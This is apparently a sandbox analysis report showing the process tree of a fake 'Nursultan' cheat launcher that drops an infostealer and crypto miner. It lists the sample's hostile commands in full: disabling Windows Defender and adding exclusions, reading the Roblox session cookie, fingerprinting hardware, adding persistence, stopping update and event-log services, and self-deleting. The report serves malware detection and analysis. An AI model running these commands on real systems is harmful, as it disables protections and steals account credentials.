  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Views/modifies file attributes
    PID:2200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2092
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2696
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2068
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2236
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:2448
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Drops startup file
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2364
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2504
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2592
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:544
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Executes dropped EXE
    PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1992
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    PID:940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
      4⤵
      Executes dropped EXE
      PID:1188
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:764
  - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      PID:1760
    - - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2392
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:532
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:1508
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:2944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2020
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        5⤵
        
        PID:1256
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        Runs ping.exe
        
        PID:1568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1124
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:2732
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2044
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:980
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
      4⤵
      Loads dropped DLL
      Adds Run key to start application
      PID:2220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2604
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:2500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2728
    - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Executes dropped EXE
        
        PID:2672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2740
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2688
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:1860
    - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        5⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1980
      - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        6⤵
        Executes dropped EXE
        
        PID:2264
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2636
      - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1704
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        
        PID:1236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:1356
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:1328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:1096
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        
        PID:2020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:1504
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        7⤵
        
        PID:568
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:2732
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2444
      - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:744
      - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2508
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Drops file in System32 directory
        
        PID:1316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2092
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        Drops file in Windows directory
        
        PID:2888
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:2968
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:1524
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:1336
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:2660
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:1096
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:2684
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:2228
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:1616
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:1608
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:2992
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        8⤵
        Launches sc.exe
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        7⤵
        
        PID:304
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:2208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        7⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        8⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        8⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1312
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Views/modifies file attributes
        
        PID:548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        
        PID:1588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:1056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:2424
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:1920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:1564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:2972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:2340
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        9⤵
        
        PID:2772
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        Runs ping.exe
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        8⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        8⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2032
        
